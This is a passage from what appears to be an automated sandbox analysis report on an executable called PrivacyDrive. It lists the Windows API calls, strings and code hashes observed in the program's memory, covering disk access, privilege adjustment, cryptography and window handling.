                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Clipboard$CloseDataOpen_malloc
                                • String ID: COPY$CUT$DELETE$Item$Menu$PASTE$PDEDIT$SELECT_ALL
                                • API String ID: 3280518109-2570738062
                                • Opcode ID: 4d766201f953f0f62a6a44b19e5f2a713d3d091d040d9cb0aec08f6faf6e64eb
                                • Instruction ID: af0c7febff64a2cb770cd02584ed81d846506efae0f0cf1189369059b4be274b
                                • Opcode Fuzzy Hash: 4d766201f953f0f62a6a44b19e5f2a713d3d091d040d9cb0aec08f6faf6e64eb
                                • Instruction Fuzzy Hash: CE81C1703043009FE710DF229855B6BBAE4FB84754F00492EFA96963C1DBB4D9098BAA
                                APIs
                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,004B0DAD,?,?,?,?,00418323,?,?), ref: 004779BC
                                • GetWindowRect.USER32(00000000,?), ref: 004779C7
                                • GetCursorPos.USER32(?), ref: 004779D1
                                • ShowCursor.USER32(00000000,?,?,?,?,00418323,?,?), ref: 004779DF
                                • SetCursorPos.USER32(?,00418319,?,?,?,?,00418323,?,?), ref: 004779EF
                                • mouse_event.USER32(00008002,?,00418319,00000000,00000000), ref: 00477A12
                                • mouse_event.USER32(00008004,?,00418319,00000000,00000000), ref: 00477A2B
                                • SetCursorPos.USER32(?,?,?,?,?,?,00418323,?,?), ref: 00477A33
                                • ShowCursor.USER32(00000001,?,?,?,?,00418323,?,?), ref: 00477A3B
                                • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000043,?,?,?,?,00418323,?,?), ref: 00477A4D
                                • SetForegroundWindow.USER32(?), ref: 00477A54
                                • SetFocus.USER32(?,?,?,?,?,00418323,?,?), ref: 00477A5B
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Cursor$Window$Showmouse_event$FocusForegroundRect
                                • String ID:
                                • API String ID: 2402844350-0
                                • Opcode ID: 17cf67ce4f21d185ae6256eb13231789ce43b5ca8ecd0f4c72bd89840be2a5d9
                                • Instruction ID: 35f5852f1461b2445c90fd6eb072ec157fbb865980a1f995b2d83013119948c3
                                • Opcode Fuzzy Hash: 17cf67ce4f21d185ae6256eb13231789ce43b5ca8ecd0f4c72bd89840be2a5d9
                                • Instruction Fuzzy Hash: 28213071A40319BFEF109B98ED86FAE77BCFB19716F100004F705FA2D1C664A9049B69
                                APIs
                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000100), ref: 0043EB5C
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0043EB88
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DiskFreeInformationSpaceVolume
                                • String ID: !@$CREATE_VOLUME$Dialog$LOCATE_PATH_INFO$NET_PATH_INFO$String$invalid string position
                                • API String ID: 3270478670-1935831191
                                • Opcode ID: 4b9d5ae12a441dfad8556cbf363f152831eab70e1e94889f7d5f6d733b2aeece
                                • Instruction ID: dc060d084ae7481b76c58541c8d08a526d08a5ad5d094ad849b10141f9d57912
                                • Opcode Fuzzy Hash: 4b9d5ae12a441dfad8556cbf363f152831eab70e1e94889f7d5f6d733b2aeece
                                • Instruction Fuzzy Hash: A4B19870208340DEE724DF25C899BABBBE5BF85704F50492EF19582291E7B9E848CB57
                                APIs
                                • swprintf.LIBCMT ref: 0045D0C2
                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,005BE234,75A8EB20,005783F0), ref: 0045D0E0
                                • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 0045D12A
                                • _memset.LIBCMT ref: 0045D16A
                                • DeviceIoControl.KERNEL32(00000000,0007C088,00000200,00000020,?,00000210,00000000,00000000), ref: 0045D1E9
                                • CloseHandle.KERNEL32(00000000), ref: 0045D29E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ControlDevice$CloseCreateFileHandle_memsetswprintf
                                • String ID: 4[P[$4[P[$\\.\PhysicalDrive%d
                                • API String ID: 3128168039-1343652002
                                • Opcode ID: 995b0b6a9c7836ec1f9f514e6d2d7ddf075d870c64d39bc998f6d00fbd4d6d75
                                • Instruction ID: 1d6612d58995b57a00baa1f531f9c234147f1bdc39e549ac61d4751d187f5a77
                                • Opcode Fuzzy Hash: 995b0b6a9c7836ec1f9f514e6d2d7ddf075d870c64d39bc998f6d00fbd4d6d75
                                • Instruction Fuzzy Hash: 9A513B71E4031C9ADB20CB24CC85BEA77B4FF45700F1481E9E989A72C2DA755A89CF94
                                APIs
                                • LookupAccountNameW.ADVAPI32(00000000,?,?,00000064,?,?,00000001), ref: 004767B7
                                • GetSidIdentifierAuthority.ADVAPI32(?), ref: 004767C9
                                • GetSidSubAuthorityCount.ADVAPI32(?), ref: 004767E6
                                • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 0047684A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Authority$AccountCountIdentifierLookupName
                                • String ID: !@$%lu$P$S-1-%lu$d
                                • API String ID: 4104353294-1107859586
                                • Opcode ID: b655fc8ef84fcb31732102b16d4b07e836e98adce3f92c00db97f488b93166ca
                                • Instruction ID: 4c0d7b7dcbf8e319412ba715ebb94211a9b64f87439bb915675130a803821b7e
                                • Opcode Fuzzy Hash: b655fc8ef84fcb31732102b16d4b07e836e98adce3f92c00db97f488b93166ca
                                • Instruction Fuzzy Hash: F441C1719016189BDB20DF65CC49BDEB7F8FF05304F1186AAE519A3290E7346B48CF91
                                APIs
                                • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,00410725,?,00000000), ref: 004D3286
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,00410725,?,00000000), ref: 004D328D
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004D32A9
                                • CloseHandle.KERNEL32(?), ref: 004D32B6
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 004D32E2
                                • CloseHandle.KERNEL32(?), ref: 004D32EB
                                • GetLastError.KERNEL32 ref: 004D32F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeDebugPrivilege
                                • API String ID: 3435690185-2896544425
                                • Opcode ID: be123d20fa19872550351cc9b7dea758de74ab990b1cd2a2551b9cda6699abe5
                                • Instruction ID: 9061d5ce5d7778e8bc93044a28d0dfe5c08405113d4df04e15f21e32a4d0d05f
                                • Opcode Fuzzy Hash: be123d20fa19872550351cc9b7dea758de74ab990b1cd2a2551b9cda6699abe5
                                • Instruction Fuzzy Hash: 80115275A4030DABDB00AFB0DC1EBBE7B79FB15702F104059F905E61E0DA705908EB55
                                APIs
                                • GetKeyState.USER32(00000011), ref: 004220AD
                                • GetKeyState.USER32(00000012), ref: 004220C9
                                • GetKeyState.USER32(00000010), ref: 004220E1
                                • GetKeyState.USER32(00000011), ref: 004220FA
                                • GetKeyState.USER32(00000012), ref: 0042211B
                                • GetKeyState.USER32(00000010), ref: 0042213C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: State
                                • String ID: N/A
                                • API String ID: 1649606143-2525114547
                                • Opcode ID: 58b50a0c3e48e1489f749ce2695fbba5d93f518a211508e8727432d17dfcf3b9
                                • Instruction ID: df62c2d8d3cb7637959c9b5c41f206f96db34c0fe90884c921772fc30bfac8c6
                                • Opcode Fuzzy Hash: 58b50a0c3e48e1489f749ce2695fbba5d93f518a211508e8727432d17dfcf3b9
                                • Instruction Fuzzy Hash: B931EA3530122777DF3C8928ED50FFFB265AB41380F85402FDA4696390CEF86851D659
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000400,0000001F,00000000,00000000,00000001,?,00000149), ref: 00485C0F
                                • GetLocaleInfoW.KERNEL32(00000400,0000001F,00000000,?), ref: 00485C56
                                • GetLocaleInfoW.KERNEL32(00000400,00001003,00000000,00000000), ref: 00485C68
                                • GetLocaleInfoW.KERNEL32(00000400,00001003,00000000,?), ref: 00485CB2
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00485CC5
                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000020), ref: 00485CE2
                                • GetTimeFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000020), ref: 00485CFC
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InfoLocale$Time$Format$DateFileSystem
                                • String ID:
                                • API String ID: 2974610873-0
                                • Opcode ID: 4563362470292cecad5032762e8ca6f054528bda2ec2bf46212665ea0baf6bfe
                                • Instruction ID: 1ff3375a3e700c5923e681f062513e789ee81be900efd369fa8ee989fe92dd05
                                • Opcode Fuzzy Hash: 4563362470292cecad5032762e8ca6f054528bda2ec2bf46212665ea0baf6bfe
                                • Instruction Fuzzy Hash: 4A31CE72B413186FEB249B619C0AFAF7A7CEF45701F008079BB09E62D1DA744D45CB65
                                APIs
                                • CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000020,?,?,?,0052D081,?,00000000), ref: 0052D154
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000028,?,?,0052D081,?,00000000), ref: 0052D16B
                                • CryptGenRandom.ADVAPI32(00000000,?,00000000,?,?,0052D081,?,00000000), ref: 0052D17B
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,0052D081,?,00000000), ref: 0052D18B
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,0052D081,?,00000000), ref: 0052D198
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Crypt$Context$AcquireRelease$Random
                                • String ID: Microsoft Base Cryptographic Provider v1.0
                                • API String ID: 3586192267-291530887
                                • Opcode ID: f9fb1fd96296513a19a0fb0b5989b8f15f5e9bbd83fbc89c04d3d9c56315c62b
                                • Instruction ID: 413c3628df44866d44bf2ce7f88935014fbe02c43720695b9fcd4a057f8b2346
                                • Opcode Fuzzy Hash: f9fb1fd96296513a19a0fb0b5989b8f15f5e9bbd83fbc89c04d3d9c56315c62b
                                • Instruction Fuzzy Hash: F0F0813164131DBBEF108B94DE49F9A7B7CEB09761F100041F908F2590D6B19E54DBA0
                                APIs
                                • SendMessageW.USER32(00000000), ref: 004CDAFE
                                • GetWindowRect.USER32(?,?), ref: 004CDC02
                                • IsIconic.USER32(00000000), ref: 004CDD25
                                • GetWindowRect.USER32(?,?), ref: 004CDE18
                                • PostMessageW.USER32(?,000019E2,00000000,00000000), ref: 004CDEAD
                                • IsZoomed.USER32(00000000), ref: 004CDFA4
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessageRectWindow$IconicPostSendZoomed
                                • String ID:
                                • API String ID: 1145140692-0
                                • Opcode ID: 60d189e479d4d4d89f9d0624bef29c5f4cca929353394832c412b226bd43be11
                                • Instruction ID: 429b9f1bb229582ca2775421ba2a5e2d946bea9619cb803b1280a95a33c5cbac
                                • Opcode Fuzzy Hash: 60d189e479d4d4d89f9d0624bef29c5f4cca929353394832c412b226bd43be11
                                • Instruction Fuzzy Hash: D0E18178B042049BD768DF25C859F7AB7A5FF84314F10082FF5568B291CB79AC01DB9A
                                APIs
                                • WaitForSingleObject.KERNEL32(?), ref: 0040D0DD
                                • EnterCriticalSection.KERNEL32(?), ref: 0040D0E9
                                • RpcBindingFree.RPCRT4(005C0BE4), ref: 0040D0FA
                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D112
                                • SetEvent.KERNEL32(?), ref: 0040D11B
                                • CloseHandle.KERNEL32(?), ref: 0040D124
                                  • Part of subcall function 0040CDF0: EnterCriticalSection.KERNEL32(?,7563D392), ref: 0040CE2C
                                  • Part of subcall function 0040CDF0: RpcStringBindingComposeW.RPCRT4(00000000,ncacn_ip_tcp,localhost,9382,00000000,00000000), ref: 0040CE5A
                                  • Part of subcall function 0040CDF0: RpcBindingFromStringBindingW.RPCRT4(00000000,005C0BE4), ref: 0040CE70
                                  • Part of subcall function 0040CDF0: RpcStringFreeW.RPCRT4(00000000), ref: 0040CE7E
                                  • Part of subcall function 0040CDF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00503130,005938C8,000000FE), ref: 0040CF1C
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: BindingCriticalSection$String$EnterFreeLeave$CloseComposeEventFromHandleObjectSingleWait
                                • String ID:
                                • API String ID: 1618485030-0
                                • Opcode ID: 49eb79fe447d7356ed6b4f90a1922c32806c2081b02803691e82cee08cb33607
                                • Instruction ID: 9dcba7a7c6c7c6fd4f9f0b95d0ac065d6fba7649e0196199bdaad57700265c64
                                • Opcode Fuzzy Hash: 49eb79fe447d7356ed6b4f90a1922c32806c2081b02803691e82cee08cb33607
                                • Instruction Fuzzy Hash: 0F017135000704DFD3219FA5ED08B6BFBF5FF6531AF00452AE55A926A0C7B9B84AEB44
                                APIs
                                • FindResourceW.KERNEL32(00000000,00000000,BIN,?,?,0042BFB6,?), ref: 004D322B
                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0042BFB6,?), ref: 004D3242
                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,0042BFB6,?), ref: 004D324D
                                • LockResource.KERNEL32(00000000,?,?,?,0042BFB6,?), ref: 004D3254
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: BIN
                                • API String ID: 3473537107-1015027815
                                • Opcode ID: 9dbd3ab9d203872fc2464589ca7f3cb3c7331685dc78100c047ace200e97a6ec
                                • Instruction ID: d1cee1dccf38ab8349605ff019cd5728398340d1e76fe9d44ad9a7f381d51279
                                • Opcode Fuzzy Hash: 9dbd3ab9d203872fc2464589ca7f3cb3c7331685dc78100c047ace200e97a6ec
                                • Instruction Fuzzy Hash: 09E06D32600B146BD2201FA6AC1CF6B7BACEBD6B23F04006AFA09C2340DA649805D771
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _fprintf_raise
                                • String ID: 3`C$G != NULL$R != NULL$k != NULL$modulus != NULL$src\pk\ecc\ltc_ecc_mulmod.c
                                • API String ID: 1988439158-2293699279
                                • Opcode ID: 58f5a62fdca9314fa8c133a51548f138444fce020bf68ed350cb9e58266452f5
                                • Instruction ID: 78124441466f39defdd5a8a769dfdebc8563226b7b26d451acda9988b9ebd78e
                                • Opcode Fuzzy Hash: 58f5a62fdca9314fa8c133a51548f138444fce020bf68ed350cb9e58266452f5
                                • Instruction Fuzzy Hash: 68026871D00228AFEF219B94ED84AEDBBB1FF58368F144025FC05A7260E7319D95DB90
                                APIs
                                • PostMessageW.USER32(?,0000060B,00000000,00000000), ref: 0043D1BD
                                • GetDriveTypeW.KERNEL32(?,<Auto>), ref: 0043D22C
                                  • Part of subcall function 004D8DA0: PostMessageW.USER32(?,0000060B,00000000,00000000), ref: 004D8DEB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
